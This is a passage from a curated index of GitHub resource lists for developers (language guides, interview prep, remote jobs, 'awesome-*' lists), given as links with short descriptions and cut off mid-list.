[guide.onym.co](https://github.com/onymco/guide.onym.co) – Tools and resources for naming things. - https://guide.onym.co * [guides](https://github.com/NARKOZ/guides) by @NARKOZ – Design and development guides * [Hackathon-Resources](https://github.com/xasos/Hackathon-Resources) by @xasos – Hackathon Resources for organizers. * [hack-chat/3rd-party-software-list](https://github.com/hack-chat/3rd-party-software-list) – Bots, clients, and other software people have made for [hack.chat](https://hack.chat). * [hacker-laws](https://github.com/dwmkerr/hacker-laws) – Laws, Theories, Principles and Patterns that developers will find useful. * [hacktoberfest-swag](https://github.com/benbarth/hacktoberfest-swag) – Looking for [Hacktoberfest](https://hacktoberfest.digitalocean.com/) swag? You've come to the right place. * [hacktoberfest-swag-list](https://github.com/crweiner/hacktoberfest-swag-list) – Companies giving out swag for participation in [Hacktoberfest](https://hacktoberfest.digitalocean.com/). - https://hacktoberfestswaglist.com * [HarmonyOS](https://github.com/Awesome-HarmonyOS/HarmonyOS) – [HarmonyOS](https://www.harmonyos.com/en/) by Huawei * [haskell-companies](https://github.com/erkmos/haskell-companies) – Companies using Haskell. * [haskell-must-watch](https://github.com/hzlmn/haskell-must-watch) * [HeadlessBrowsers](https://github.com/dhamaniasad/HeadlessBrowsers) * [hipchat-alternatives](https://github.com/cjbarber/hipchat-alternatives) * [hiring-without-whiteboards](https://github.com/poteto/hiring-without-whiteboards) – Companies that don't have a broken hiring process. * [htaccess](https://github.com/phanan/htaccess) – Useful .htaccess snippets. * [hyperawesome](https://github.com/jorgebucaran/hyperawesome) – Hyperapp JavaScript framework * [idaplugins-list](https://github.com/onethawt/idaplugins-list) – Plugins for [IDA disassembler](https://www.hex-rays.com/products/ida/). * [ideas](https://github.com/samsquire/ideas) – One Hundred Ideas for Computing * [InfoSec-Black-Friday](https://github.com/0x90n/InfoSec-Black-Friday) – Deals for InfoSec related software/tools this Black Friday * [Inspire](https://github.com/NoahBuscher/Inspire) – Links to assist you in web design and development * [interviews](https://github.com/kdn251/interviews) – Your personal guide to Software Engineering technical interviews. * [InterviewThis](https://github.com/Twipped/InterviewThis) – Developer questions to ask prospective employers * [ios-awesome-libraries](https://github.com/kaiinui/ios-awesome-libraries) – Useful iOS development libraries with usage examples. * [iOS-Developer-and-Designer-Interview-Questions](https://github.com/9magnets/iOS-Developer-and-Designer-Interview-Questions) * [iOSDevResource](https://github.com/objcc/iOSDevResource) * [iptv](https://github.com/iptv-org/iptv) – 5000+ publicly available IPTV channels from all over the world. * [javacard-curated-list](https://github.com/EnigmaBridge/javacard-curated-list) – Java Card applets and related applications for cryptographic smartcards. * [javascript-dev-bookmarks](https://github.com/didicodes/javascript-dev-bookmarks) – Articles that will help you get better at JavaScript. * [javascript-patterns](https://github.com/shichuan/javascript-patterns) – JavaScript Patterns - http://shichuan.github.io/javascript-patterns/ * [javascript-resources](https://github.com/ztsu/javascript-resources) * [javascript-sdk-design](https://github.com/hueitan/javascript-sdk-design) * [jquery-tips-everyone-should-know](https://github.com/AllThingsSmitty/jquery-tips-everyone-should-know) * [jsemu](https://github.com/fcambus/jsemu) – Emulators written in JavaScript. * [jslibs](https://github.com/esamattis/jslibs) – My picks of promising/useful Javascript libraries. - *See also [JSwiki](http://jswiki.org/)* * [js-must-watch](https://github.com/bolshchikov/js-must-watch) – Must-watch videos about javascript. * [jsonauts](https://github.com/jsonauts/jsonauts.github.com) – The ultimate reference for JSON tooling and specs. - http://jsonauts.github.io/ * [jstips](https://github.com/loverajoel/jstips) – JavaScript tips - http://jstips.co * [jstools](https://github.com/codefellows/jstools) – Foundational JavaScript Tools * [js-type-master](https://github.com/yumyo/js-type-master) – JavaScript resources about web typography. - https://www.codefellows.org/blog/a-list-of-foundational-javascript-tools * [Julia.jl](https://github.com/svaksha/Julia.jl) – Curated decibans of Julia language. - https://github.com/svaksha/Julia.jl * [killer-talks](https://github.com/PharkMillups/killer-talks) – Talks that are worth watching. * [kubernetes-failure-stories](https://github.com/hjacobs/kubernetes-failure-stories) – Public failure/horror stories related to Kubernetes - https://k8s.af * [langs-in-rust](https://github.com/alilleybrinker/langs-in-rust) – Programming languages implemented in Rust. * [Laravel-Resources](https://github.com/abhimanyu003/Laravel-Resources) – Laravel Framework Resources and Blogs. * [learn-drupal](https://github.com/rocketeerbkw/learn-drupal) – Stuff to help you learn Drupal. * [learn-for-free](https://github.com/aviaryan/learn-for-free) – Free learning resources for all topics you can think of. * [learnhaskell](https://github.com/bitemyapp/learnhaskell) – A curated guide for learning Haskell. * [learning-code-through-github-repos](https://github.com/muchirijane/learning-code-through-github-repos) – Github repositories that you can use in your coding journey. * [learn-python](https://github.com/adrianmoisey/learn-python) by @adrianmoisey – Links that teach Python. * [learn-python](https://github.com/trekhleb/learn-python) by @trekhleb – Python scripts that are split by topics and contain code examples with explanations. * [learn-to-program](https://github.com/karlhorky/learn-to-program) – Foundation in Web Development. * [learn-tt](https://github.com/jozefg/learn-tt) – Resources for learning type theory. * [learnxinyminutes-docs](https://github.com/adambard/learnxinyminutes-docs) – Code documentation written as code! - https://learnxinyminutes.com/ * [libertr](https://github.com/gaapt/libertr) – Resources for liberty seekers. * [lifeofjs](https://github.com/abhijeetkpawar/lifeofjs) – Curated source for all types of awesome resources available for JavaScript. * [Linux_websites](https://github.com/hduffddybz/Linux_websites) _In Chinese_ – Websites related to Linux kernel development. * [list-of-python-api-wrappers](https://github.com/realpython/list-of-python-api-wrappers) – Python API Wrappers and Libraries. * [lua-languages](https://github.com/hengestone/lua-languages) – Languages that compile to Lua. * [machine-learning-algorithms](https://github.com/Sahith02/machine-learning-algorithms) – Conceptual understanding of all machine learning algorithms. * [Machine-Learning-Tutorials](https://github.com/ujjwalkarn/Machine-Learning-Tutorials) – Machine Learning and Deep Learning Tutorials * [machine-learning-with-ruby](https://github.com/arbox/machine-learning-with-ruby) – Machine learning in Ruby * [macos-apps](https://github.com/learn-anything/macos-apps) * [magictools](https://github.com/ellisonleao/magictools) – Game Development resources to make magic happen. * [maintenance-modules](https://github.com/maxogden/maintenance-modules) – NPM / Node.js modules useful for maintaining or developing modules * [manong](https://github.com/nemoTyrant/manong) _In Chinese_ – Weekly digest of technology * [markdown-resources](https://github.com/rhythmus/markdown-resources) – Markdown resources: apps, dialects, parsers, people, … * [Marketing-for-Engineers](https://github.com/goabstract/Marketing-for-Engineers) – Marketing articles & tools to grow your product. * [mind-bicycles](https://github.com/pel-daniel/mind-bicycles) – Future of programming projects * [motion-ui-design](https://github.com/fliptheweb/motion-ui-design) – Motion UI design, animations and transitions. * [movies-for-hackers](https://github.com/k4m4/movies-for-hackers) - https://hackermovie.club/ * [must-watch-css](https://github.com/AllThingsSmitty/must-watch-css) – Must-watch videos about CSS. * [must-watch-javascript](https://github.com/AllThingsSmitty/must-watch-javascript) – Must-watch videos about JavaScript. * [my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) – Open source tools for AWS security: defensive, offensive, auditing, DFIR, etc. * [my_tech_resources](https://github.com/JamesLavin/my_tech_resources) by @JamesLavin * [nashville-lispers/resources](https://github.com/nashville-lispers/resources) – Lisp Resources: exercises, great books, videos, etc. * [net-libraries-that-make-your-life-easier](https://github.com/tallesl/net-libraries-that-make-your-life-easier) – Open Source .NET libraries that make your life easier. * [neural-network-papers](https://github.com/robertsdionne/neural-network-papers) * [nginx-resources](https://github.com/fcambus/nginx-resources) – Nginx web server (+ Lua), OpenResty and Tengine. * [nlp_thai_resources](https://github.com/kobkrit/nlp_thai_resources) – Natural Language Processing for Thai * [nlp-with-ruby](https://github.com/arbox/nlp-with-ruby) – Practical Natural Language Processing done in Ruby - http://rubynlp.org * [node-daily](https://github.com/dailyNode/node-daily) _In Chinese_ – Daily article about Node.js. * [node-frameworks](https://github.com/pillarjs/node-frameworks) – Comparison of server-side Node frameworks. * [nodejs-conference-cfps](https://github.com/rosskukulinski/nodejs-conference-cfps) – NodeJS and Javascript Conference Call for Presentations. * [NodeJS-Learning](https://github.com/sergtitov/NodeJS-Learning) – Resources to help you learn Node.js and keep up to date. * [NotesIndex](https://github.com/Wilbeibi/NotesIndex) * [not-yet-awesome-rust](https://github.com/not-yet-awesome-rust/not-yet-awesome-rust) – Rust code and resources that do NOT exist yet, but would be beneficial to the Rust community. * [offline-first](https://github.com/pazguille/offline-first) – Everything you need to know to create offline-first web apps. * [openapi-specification-extensions](https://github.com/Mermade/openapi-specification-extensions) – Common and standardised OpenAPI specification (vendor) extensions. * [opendronelist](https://github.com/dronetag/opendronelist) – Database of drones and their common properties. - https://dronetag.github.io/opendronelist/ * [open-llms](https://github.com/eugeneyan/open-llms) – Open Large Language Models available for commercial use. * [open-product-management](https://github.com/ProductHired/open-product-management) – Product management advice for technical people. * [open-source-android-apps](https://github.com/pcqpcq/open-source-android-apps) – Collection of Android Apps which are open source. * [open-source-ios-apps](https://github.com/dkhamsing/open-source-ios-apps) – Open-source iOS apps. * [open-source-mac-os-apps](https://github.com/serhii-londar/open-source-mac-os-apps) – macOS open source applications. * [open-source-meetup-alternatives](https://github.com/coderbyheart/open-source-meetup-alternatives) * [opensource-discordbots](https://github.com/gillesheinesch/opensource-discordbots) – Open-source bots for Discord. * [ops-books](https://github.com/stack72/ops-books) – Book recommendations related to Continuous Delivery, DevOps, Operations and Systems Thinking. * [osx-and-ios-security-awesome](https://github.com/ashishb/osx-and-ios-security-awesome) – OSX and iOS related security tools * [papers](https://github.com/NicolasT/papers) – A collection of papers found across the web. * [papers-we-love](https://github.com/papers-we-love/papers-we-love) – Papers from the computer science community to read and discuss. (Contains actual papers) * [ParseAlternatives](https://github.com/relatedcode/ParseAlternatives) – Alternative backend service providers ala [Parse](http://parse.com/). * [pattern_classification](https://github.com/rasbt/pattern_classification) – A collection of tutorials and examples for solving and understanding machine learning and pattern classification tasks. * [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) – Useful payloads and bypasses for Web Application Security and Pentest/CTF * [personal-security-checklist](https://github.com/Lissy93/personal-security-checklist) – 100+ tips for protecting digital security and privacy * [php-must-watch](https://github.com/phptodayorg/php-must-watch) – Must-watch videos about PHP. * [phpvietnam/bookmarks](https://github.com/phpvietnam/bookmarks) – PHP resources for Vietnamese. * [PlacesToPostYourStartup](https://github.com/mmccaff/PlacesToPostYourStartup) – “Where can I post my startup to get beta users?” * [planetruby/calendar](https://github.com/planetruby/calendar) – Ruby events (meetups, conferences, camps, etc.) from around the world. - https://planetruby.github.io/calendar/ * [post-mortems](https://github.com/danluu/post-mortems) * [Product-Management-and-Leadership](https://github.com/ElizaLo/Product-Management-and-Leadership) * [programmers-proverbs](https://github.com/AntJanus/programmers-proverbs) – Proverbs from the programmer * [programming-talks](https://github.com/hellerve/programming-talks) – Awesome & Interesting Talks concerning Programming * [progressive-enhancement-resources](https://github.com/jbmoelker/progressive-enhancement-resources) – (code) examples. * [project-based-learning](https://github.com/tuvtran/project-based-learning) – Programming tutorials to build an application from scratch. * [Projects](https://github.com/karan/Projects) – Practical projects that anyone can solve in any programming language. * [public-api-lists](https://github.com/public-api-lists/public-api-lists) – Free APIs for use in software and web development (fork of [public-apis](https://github.com/public-apis/public-apis)) * [public-apis](https://github.com/public-apis/public-apis) – JSON APIs for use in web development. * [purescript-companies](https://github.com/ajnsit/purescript-companies) – Companies that use Purescript * [pycrumbs](https://github.com/kirang89/pycrumbs) – Bits and Bytes of Python from the Internet. * [py-must-watch](https://github.com/s16h/py-must-watch) by @s16h – Must-watch videos about Python. * [python-github-projects](https://github.com/checkcheckzz/python-github-projects) – Collect and classify python projects on Github. - http://itgeekworkhard.com/python-github-projects/ * [pythonidae](https://github.com/svaksha/pythonidae) – Curated decibans of Python scientific programming resources. - http://svaksha.github.io/pythonidae/ * [python-must-watch](https://github.com/primalpop/python-must-watch) by @primalpop – Must-watch videos about Python. * [python_reference](https://github.com/rasbt/python_reference) – Useful functions, tutorials, and other Python-related things. * [Qix](https://github.com/ty4z2008/Qix) _In Chinese_ – Node, Golang, Machine Learning, PostgreSQL. * [queues.io](https://github.com/lukaszx0/queues.io) – Job queues, message queues and other queues. - http://queues.io/ * [quick-look-plugins](https://github.com/sindresorhus/quick-look-plugins) – macOS Quick Look plugins for developers * [rails-must-watch](https://github.com/gerricchaplin/rails-must-watch) – Must-watch videos about Ruby on Rails. * [rbooks](https://github.com/RomanTsegelskyi/rbooks) – R programming language books * [remote-in-japan](https://github.com/remote-jp/remote-in-japan) – Tech companies in Japan that hire remote workers. * [remote-jobs](https://github.com/remoteintech/remote-jobs) – Semi to fully remote-friendly companies in tech. * [remote-jobs-brazil](https://github.com/lerrua/remote-jobs-brazil) – Remote-friendly Brazilian companies. * [remote-software-companies](https://github.com/RemoteByDefault/remote-software-companies) – Remote companies with information about tech stack and salary. * [resource-list](https://github.com/kyasui/resource-list) – Design & Development Resources. * [resources](https://github.com/jbranchaud/resources) by @jbranchaud – Free, online resources for various technologies, languages, and tools. * [Resources](https://github.com/tevko/Resources) by @tevko – Tools for front end devs. * [Resources-for-Beginner-Bug-Bounty-Hunters](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters) – Getting started with bug bounties. * [Resources-for-Writing-Shaders-in-Unity](https://github.com/VoxelBoy/Resources-for-Writing-Shaders-in-Unity) * [retter](https://github.com/MaciejCzyzewski/retter) – Hash functions, ciphers, tools, libraries, and materials related to cryptography & security. * [reverse-interview](https://github.com/viraptor/reverse-interview) – Questions to ask the company during your interview * [Rich-Hickey-fanclub](https://github.com/tallesl/Rich-Hickey-fanclub) – Rich Hickey's works on the internet. * [rss-readers-list](https://github.com/smithbr/rss-readers-list) – Reader replacements megalist - http://smithbr.github.io/rss-readers-list * [rubybib.org](https://github.com/rubybib/rubybib.org) – The Ruby Bibliography - http://rubybib.org/ * [ruby-bookmarks](https://github.com/dreikanter/ruby-bookmarks) – Ruby and Ruby on Rails bookmarks collection. * [ruby-dev-bookmarks](https://github.com/saberma/ruby-dev-bookmarks) – Ruby development resources I've collected. * [ruby-nlp](https://github.com/diasks2/ruby-nlp) – Ruby Natural Language Processing (NLP) libraries, tools and software. * [rust-lang-resources](https://github.com/dschenkelman/rust-lang-resources) – Links related to the Rust programming language. * [rxjs-ecosystem](https://github.com/Widdershin/rxjs-ecosystem) – What are the most popular libraries in the RxJS ecosystem? * [rx-react-flux](https://github.com/christianramsey/rx-react-flux) – RxJS + React/Flux implementations. * [scalable-css-reading-list](https://github.com/davidtheclark/scalable-css-reading-list) – Collected dispatches from The Quest for Scalable CSS. * [search-engine-optimization](https://github.com/marcobiedermann/search-engine-optimization) – Checklist / collection of Search Engine Optimization (SEO) tips and technics. * [SecLists](https://github.com/danielmiessler/SecLists) – Lists used during security assessments: usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, etc. * [secure-email](https://github.com/OpenTechFund/secure-email) – Overview of projects working on next-generation secure email. * [Security_list](https://github.com/zbetcheckin/Security_list) * [selfhosted-music-overview](https://github.com/basings/selfhosted-music-overview) – Software network services which can be hosted on your own servers. * [services-engineering](https://github.com/mmcgrana/services-engineering) – A reading list for services engineering, with a focus on cloud infrastructure services. * [shellshocker-pocs](https://github.com/mubix/shellshocker-pocs) – Proof of concepts and potential targets for Shellshock. * [slack-groups](https://github.com/learn-anything/slack-groups) – Public Slack communities. * [spark-joy](https://github.com/sw-yx/spark-joy) – Add design flair, user delight, and whimsy to your product. * [spawnedshelter](https://github.com/unbalancedparentheses/spawnedshelter) – Erlang Spawned Shelter – the best articles, videos and presentations related to Erlang. * [speech-language-processing](https://github.com/edobashira/speech-language-processing) * [stack-on-a-budget](https://github.com/255kb/stack-on-a-budget) – Services with great free tiers for developers on a budget * [startup-must-watch](https://github.com/gerricchaplin/startup-must-watch) – Must-watch videos devoted to Entrepreneurship and Startups. * [startupreadings](https://github.com/dennybritz/startupreadings) – Reading list for all things startup-related. * [startup-resources](https://github.com/JonathanZWhite/startup-resources) * [state-machines](https://github.com/achou11/state-machines) * [static-analysis](https://github.com/analysis-tools-dev/static-analysis) – Static analysis tools, linters and code quality checkers * [Static-Site-Generators](https://github.com/pinceladasdaweb/Static-Site-Generators) * [staticsitegenerators-list](https://github.com/bevry/staticsitegenerators-list) - https://staticsitegenerators.net/ * [streaming-papers](https://github.com/sorenmacbeth/streaming-papers) – Papers on streaming algorithms. * [structured-text-tools](https://github.com/dbohdan/structured-text-tools) – Command line tools for manipulating structured text data * [styleguide-generators](https://github.com/davidhund/styleguide-generators) – Automatic living styleguide generators. * [sublime](https://github.com/JaredCubilla/sublime) – Some of the best Sublime Text packages, themes, and goodies. * [sublime-bookmarks](https://github.com/dreikanter/sublime-bookmarks) – Sublime Text essential plugins and resources. * [svelte/integrations](https://github.com/sveltejs/integrations) – Ways to incorporate [Svelte](https://svelte.dev/) framework into your stack * [SwiftInFlux](https://github.com/ksm/SwiftInFlux) – An attempt to gather all that is in flux in Swift. * [tech-weekly](https://github.com/adrianmoisey/tech-weekly) – Weekly technical newsletters. * [terminals-are-sexy](https://github.com/k4m4/terminals-are-sexy) – Terminal frameworks, plugins & resources for CLI lovers. - https://terminalsare.sexy/ * [the-book-of-secret-knowledge](https://github.com/trimstray/the-book-of-secret-knowledge) – Inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more. * [The-Documentation-Compendium](https://github.com/kylelobo/The-Documentation-Compendium) – Templates & tips on writing high-quality documentation * [the-engineering-managers-booklist](https://github.com/jesselpalmer/the-engineering-managers-booklist) – Books for people who are or aspire to manage/lead team(s) of software engineers. * [The-HustleGPT-Challenge](https://github.com/jtmuller5/The-HustleGPT-Challenge) – Building Startups with an AI Co-Founder. * [think-awesome](https://github.com/thinkjs/think-awesome) – [ThinkJS](https://thinkjs.org/) Node.js framework * [til](https://github.com/jbranchaud/til) – Today I Learned. * [tips](https://github.com/git-tips/tips) – Most commonly used git tips and tricks. - http://git.io/git-tips * [Toolbox](https://github.com/Dillion/Toolbox) – Open source iOS stuff. * [tool_lists](https://github.com/johnyf/tool_lists) – Links to tools by theme. *Verification, synthesis, and static analysis.* * [tools](https://github.com/lvwzhen/tools) – Tools for web. * [toolsforactivism](https://github.com/drewrwilson/toolsforactivism) – Digital tools for activism * [tools-list](https://github.com/everestpipkin/tools-list) – Open source, experimental, and tiny tools for building game/website/interactive project. - https://tinytools.directory/ * [ToolsOfTheTrade](https://github.com/cjbarber/ToolsOfTheTrade) – Tools of The Trade, from Hacker News. * [top-starred-devs-and-repos-to-follow](https://github.com/StijnMiroslav/top-starred-devs-and-repos-to-follow) – Top-Starred Python GitHub Devs, Orgs, and Repos to Follow (All-Time and Trending). * [translations](https://github.com/oldratlee/translations) – Chinese translations for classic IT resources. * [trending-repositories](https://github.com/Semigradsky/trending-repositories) – Repositories that were trending for a day. * [trip-to-iOS](https://github.com/Aufree/trip-to-iOS) _In Chinese_ – Delightful iOS resources. * [twofactorauth](https://github.com/2factorauth/twofactorauth) – Sites with two factor auth support which includes SMS, email, phone calls, hardware, and software. - https://twofactorauth.org/ * [type-findings](https://github.com/charliewilco/type-findings) – Posts about web typography. * [type-trident](https://github.com/anuraghazra/type-trident) – Advanced type level madness for TypeScript. * [typography](https://github.com/deanhume/typography) – Web typography - https://deanhume.github.io/typography/ * [ui-styleguides](https://github.com/kevinwuhoo/ui-styleguides) - http://kevinformatics.com/ui-styleguides/ * [universities-on-github](https://github.com/filler/universities-on-github) – Universities which have a public organization on GitHub. * [upcoming-conferences](https://github.com/svenanders/upcoming-conferences) – Upcoming web developer conferences. * [vertx-awesome](https://github.com/vert-x3/vertx-awesome) – [Vert.x](http://vertx.io/) toolkit * [vim-galore](https://github.com/mhinz/vim-galore) – All things Vim! * [visual-programming-codex](https://github.com/ivanreese/visual-programming-codex) – Resources and references for the past and future of visual programming. * [web-audio-resources](https://github.com/alemangui/web-audio-resources) – A list of curated resources related to the Web audio API. * [WebComponents-Polymer-Resources](https://github.com/matthiasn/WebComponents-Polymer-Resources) * [webcomponents-the-right-way](https://github.com/mateusortiz/webcomponents-the-right-way) – Introduction to Web Components. * [web-dev-resources](https://github.com/ericandrewlewis/web-dev-resources) – A table of contents for web developer resources across the internet. * [web-development-resources](https://github.com/MasonONeal/web-development-resources) * [webdev-jokes](https://github.com/jerstew/webdev-jokes) – Web development jokes. * [webdevresourcecuration](https://github.com/lwakefield/webdevresourcecuration) * [weekly](https://github.com/zenany/weekly) _In Chinese_ – Weekly summary of articles and resources. * [what-next](https://github.com/messa/what-next) _In Czech_ – Co dělat, když se chci naučit programovat ještě víc. * [Women-Made-It](https://github.com/LisaDziuba/Women-Made-It) – Design & development tools, books, podcasts, and blogs made by women. * [work-from-anywhere](https://github.com/Nithur-M/work-from-anywhere) – Remote, location-independent jobs. - https://nithur-m.github.io/work-from-anywhere/ * [Worth-Reading-the-Android-technical-articles](https://github.com/zmywly8866/Worth-Reading-the-Android-technical-articles) _In Chinese_ * [You-Dont-Need](https://github.com/you-dont-need/You-Dont-Need) – People choose popular projects, often not because it applies to their problems. ### awesome-* * [awesome-2048-and-beyond](https://github.com/cstrap/awesome-2048-and-beyond) – Waste and lose at least 8 hours of your life… then **multiply** it… * [awesome4girls](https://github.com/cristianoliveira/awesome4girls) – Inclusive events/projects/initiatives for women in the tech area. * [awesome-a11y](https://github.com/brunopulis/awesome-a11y) – Accesibility tools, articles and resources. * [awesome-accessibility](https://github.com/GonzagaAccess/awesome-accessibility) – Utilities for accessibility-based web development * [awesome-acf](https://github.com/navidkashani/awesome-acf) – Add-ons for the Advanced Custom Field plugin for WordPress. * [awesome-actions](https://github.com/sdras/awesome-actions) – [GitHub Actions](https://github.com/features/actions) * [awesome-actionscript3](https://github.com/robinrodricks/awesome-actionscript3) – ActionScript 3 and Adobe AIR. * [awesome-activeadmin](https://github.com/serradura/awesome-activeadmin) – Active Admin resources, extensions, posts and utilities. *For Rails.* * [awesome-activitypub](https://github.com/BasixKOR/awesome-activitypub) – ActivityPub based projects * [awesome-ad-free](https://github.com/johnjago/awesome-ad-free) – Ad-free alternatives to popular services on the web * [awesome-ada](https://github.com/ohenley/awesome-ada) – Ada and SPARK programming language * [awesome-adafruitio](https://github.com/adafruit/awesome-adafruitio) – [Adafruit IO](https://io.adafruit.com/) Internet of Things platform * [awesome-advent-of-code](https://github.com/Bogdanp/awesome-advent-of-code) – [Advent of Code](https://adventofcode.com/) * [awesome-age](https://github.com/FiloSottile/awesome-age) – [age file encryption](https://age-encryption.org/) ecosystem. * [awesome-agile](https://github.com/lorabv/awesome-agile) – Agile Software Development. - https://lorabv.github.io/awesome-agile * [awesome-agile-essentials](https://github.com/SaadAAkash/awesome-agile-essentials) – Agile Software Development * [awesome-agriculture](https://github.com/brycejohnston/awesome-agriculture) – Open source technology for agriculture, farming, and gardening * [awesome-ai-art-image-synthesis](https://github.com/altryne/awesome-ai-art-image-synthesis) – Tools, ideas, prompt engineering tools, colabs, models, and helpers for the prompt designer playing with aiArt and image synthesis. Covers Dalle2, MidJourney, StableDiffusion, and open source tools. * [awesome-alfred-workflows](https://github.com/alfred-workflows/awesome-alfred-workflows) – [Alfred](https://www.alfredapp.com/) macOS app workflows * [awesome-algolia](https://github.com/algolia/awesome-algolia) – [Algolia](https://www.algolia.com/) web search service * [awesome-algorithms](https://github.com/tayllan/awesome-algorithms) – Places to learn and/or practice algorithms. * [awesome-algorithms-education](https://github.com/gaerae/awesome-algorithms-education) – Learning and practicing algorithms - https://gaerae.com/awesome-algorithms * [awesome-alternatives](https://gitlab.com/linuxcafefederation/awesome-alternatives) – Mostly free and open source alternatives to proprietary software and services. * [awesome-ama-answers](https://github.com/stoeffel/awesome-ama-answers) – @stoeffel's AMA answers * [awesome-amazon-alexa](https://github.com/miguelmota/awesome-amazon-alexa) – Resources for the Amazon Alexa platform. * [awesome-amazon-seller](https://github.com/ScaleLeap/awesome-amazon-seller) – Tools and resources for Amazon sellers. * [awesome-analytics](https://github.com/onurakpolat/awesome-analytics) – Analytics services, frameworks, software and other tools. * [awesome-android](https://github.com/Jackgris/awesome-android) _In Spanish._ by @Jackgris * [awesome-android](https://github.com/JStumpp/awesome-android) by @JStumpp * [awesome-android](https://github.com/snowdream/awesome-android) _Partially in Chinese_ by @snowdream * [awesome-android-awesomeness](https://github.com/yongjhih/awesome-android-awesomeness) * [awesome-android-kotlin-apps](https://github.com/androiddevnotes/awesome-android-kotlin-apps) – Open-source Android apps written in Kotlin with particular tech stack and libraries. * [awesome-android-learner](https://github.com/MakinGiants/awesome-android-learner) – A “study guide” for mobile development. * [awesome-android-learning-resources](https://github.com/androiddevnotes/awesome-android-learning-resources) * [awesome-android-libraries](https://github.com/wasabeef/awesome-android-libraries) – General Android libraries. * [awesome-android-performance](https://github.com/Juude/awesome-android-performance) – Performance optimization on Android. * [awesome-android-release-notes](https://github.com/pedronveloso/awesome-android-release-notes) – Keep up-to-date with all the things related with Android software development. * [awesome-android-tips](https://github.com/jiang111/awesome-android-tips) _In Chinese_ * [awesome-android-ui](https://github.com/wasabeef/awesome-android-ui) – UI/UX libraries for Android. * [awesome-androidstudio-plugins](https://github.com/jiang111/awesome-androidstudio-plugins) _In Chinese_ * [awesome-angular](https://github.com/hugoleodev/awesome-angular) by @hugoleodev * [awesome-angular](https://github.com/PatrickJS/awesome-angular) by @PatrickJS * [awesome-angularjs](https://github.com/gianarb/awesome-angularjs) by @gianarb * [awesome-animation](https://github.com/Animatious/awesome-animation) – Open-source UI animations by Animatious Group. * [awesome-ansible](https://github.com/jdauphant/awesome-ansible) – [Ansible](https://www.ansible.com/) configuration management * [awesome-answers](https://github.com/cyberglot/awesome-answers) – Inspiring and thoughtful answers given at stackoverflow, quora, etc. * [awesome-ant-design](https://github.com/websemantics/awesome-ant-design) – [Ant Design](https://ant.design/) system * [awesome-api](https://github.com/Kikobeats/awesome-api) – Design and implement RESTful API's * [Awesome_APIs](https://github.com/TonnyL/Awesome_APIs) * [awesome-apollo-graphql](https://github.com/ooade/awesome-apollo-graphql) – [Apollo GraphQL](https://www.apollographql.com/) * [awesome-app-ideas](https://github.com/tastejs/awesome-app-ideas) – Ideas for apps to demonstrate how framework or library approach specific problems. * [awesome-appium](https://github.com/SrinivasanTarget/awesome-appium) – [Appium](http://appium.io/) test automation frmework * [awesome-apple](https://github.com/joeljfischer/awesome-apple) – 3rd party libraries and tools for Apple platforms development. * [awesome-appsec](https://github.com/paragonie/awesome-appsec) – Resources for developers to learn application security. * [awesome-arabic](https://github.com/OthmanAba/awesome-arabic) – Arabic supporting tools, fonts, and development resources. * [Awesome-arduino](https://github.com/Lembed/Awesome-arduino) – Arduino hardwares, libraries and softwares with update script * [awesome-argo](https://github.com/terrytangyuan/awesome-argo) – [Argo](https://argoproj.github.io/) tools for Kubernetes. * [awesome-arm-exploitation](https://github.com/HenryHoggard/awesome-arm-exploitation) – ARM processors security and exploitation. * [awesome-artificial-intelligence](https://github.com/owainlewis/awesome-artificial-intelligence) * [awesome-asciidoc](https://github.com/bodiam/awesome-asciidoc) – Collection of AsciiDoc tools, guides, tutorials and examples of usage. * [awesome-asciidoctor](https://github.com/dongwq/awesome-asciidoctor) – Collection of asciidoctor’s intros, examples and usages. * [awesome-ast](https://github.com/chadbrewbaker/awesome-ast) by @chadbrewbaker – Tools for Abstract Syntax Tree processing. * [awesome-ast](https://github.com/cowchimp/awesome-ast) by @cowchimp – Abstract Syntax Trees. * [awesome-asyncio](https://github.com/timofurrer/awesome-asyncio) – [asyncio](https://docs.python.org/3/library/asyncio.html) Python library * [awesome-asyncio-cn](https://github.com/chenjiandongx/awesome-asyncio-cn) _In Chinese_ – [asyncio](https://docs.python.org/3/library/asyncio.html) Python library - https://awesome-asyncio-cn.chenjiandongx.com/ * [awesome-atom](https://github.com/mehcode/awesome-atom) – [Atom](https://atom.io/) text editor * [awesome-audio-visualization](https://github.com/willianjusten/awesome-audio-visualization) * [awesome-aurelia](https://github.com/aurelia-contrib/awesome-aurelia) – [Aurelia](https://aurelia.io/) JavaScript framework * [awesome-authentication](https://github.com/gitcommitshow/awesome-authentication) * [awesome-AutoHotkey](https://github.com/ahkscript/awesome-AutoHotkey) – AutoHotkey libraries, library distributions, scripts, tools and resources. * [awesome-AutoIt](https://github.com/J2TeaM/awesome-AutoIt) – UDFs, example scripts, tools and useful resources for AutoIt. - https://j2team.github.io/awesome-AutoIt/ * [awesome-automotive](https://github.com/Marcin214/awesome-automotive) – Automotive engineering. * [awesome-ava](https://github.com/avajs/awesome-ava) – [AVA](https://github.com/avajs/ava) JavaScript test runner. * [awesome-avr](https://github.com/fffaraz/awesome-avr) * [awesome-aws](https://github.com/donnemartin/awesome-aws) – Amazon Web Services (AWS) * [awesome-backbone](https://github.com/sadcitizen/awesome-backbone) – Resources for [Backbone.js](http://backbonejs.org/) * [awesome-bash](https://github.com/awesome-lists/awesome-bash) * [awesome-bci](https://github.com/NeuroTechX/awesome-bci) – Brain-Computer Interface. * [awesome-beacon](https://github.com/rabschi/awesome-beacon) – Bluetooth beacon (iBeacon, Eddystone) * [awesome-beancount](https://github.com/wzyboy/awesome-beancount) – [Beancount](http://furius.ca/beancount/), a double-entry bookkeeping with text files. * [awesome-bem](https://github.com/getbem/awesome-bem) – Tools, sites, articles about BEM (frontend development method). * [awesome-big-o](https://github.com/okulbilisim/awesome-big-o) – Big O notation * [awesome-bigdata](https://github.com/onurakpolat/awesome-bigdata) – Big data frameworks, resources and other awesomeness. * [Awesome-Billing](https://github.com/kdeldycke/awesome-billing) – Payments, invoicing, pricing, accounting, marketplace, fraud, and business intelligence. * [Awesome-Bioinformatics](https://github.com/danielecook/Awesome-Bioinformatics) – Open-source bioinformatics software and libraries. * [awesome-biological-image-analysis](https://github.com/hallvaaw/awesome-biological-image-analysis) – Image analysis in biology. * 